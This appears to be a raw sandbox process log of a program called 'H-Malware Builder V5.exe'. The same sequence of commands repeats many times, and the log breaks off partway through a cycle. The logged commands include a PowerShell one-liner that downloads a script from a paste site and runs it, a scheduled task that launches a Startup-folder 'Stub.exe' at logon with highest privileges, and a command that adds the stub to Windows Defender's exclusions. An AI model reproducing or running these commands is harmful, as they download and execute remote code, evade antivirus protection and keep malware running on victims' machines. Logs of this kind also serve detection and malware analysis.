"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2310cd9c-15d2-4b88-a8ed-14d0ccd5d1b1}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{740b4f08-06cf-4294-87b5-8f0fe1e1f57a}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2087676489339879264-1169753059-18125351536154226-1994078599-1997952109728018215"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a35b5078-7b7c-4b44-964b-f267d38dc117}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1865670279-1240211355435769847-1203041581022877003-996365095-1644369456734126201"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2661699611046050129-1058606379-1983136055379924222209171868514846990337652463"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3d57c5a9-c5f5-4aae-995f-5bfbd31a79c4}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{95e0a682-510a-4a2f-9391-b75b547e8299}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "514871346-731776826-1899487008945581581646472481146772137627917404-2137866475"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{14057d92-4134-42cd-9f9c-ffd41585f978}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{420b2da5-6cb0-4972-a62a-dd7e5c1fc99d}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{cc077a7a-4c87-4ff4-960e-94f05d8bd47c}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{45129db5-dc2f-4bf1-9439-cd7a230e6e52}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3758162852124014533-373065555-2103267526-144762010417700574841116986986-608347837"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{fa7eb933-1d38-46be-8ec2-7c3fc4d3862f}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{318f0c5d-41c0-4ba0-bf24-a46d974b2039}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "705666293-245080221681799987-124701558485829771798374253352083808-490427064"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{93fac4d0-049d-4485-bee5-c0e955939cb9}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1dbe4f64-8a2d-436e-8a8c-59f2368d2eaa}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c27c4967-f64b-4563-ae8b-9740f70871e8}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1121423432-50840839661544309-1710175127-2077003203-999313312-603799109-846385290"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{049511e8-e46a-4c19-b1c6-897ed29b3e3b}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "635167627-17080373767285125292086071969-1217392654-1512151085-937415599-486145282"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{4bfeec20-46f9-49a9-a63c-08d41174259d}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-491960003244177076-121763515919111580736519693971727148598913792924422635901"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ed1453cb-852e-4884-a9ab-71df54dc0a64}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-6342109241466957290-360005485-343090638-331268889181025871-18779670991200740944"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b7007752-5b45-478c-8c91-0bfa4995734b}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{02f902a9-0a61-4a40-bdae-594a162835d1}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19009838131843153552-1842022178-2014224042-991290985-1983385610838142633-577580854"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
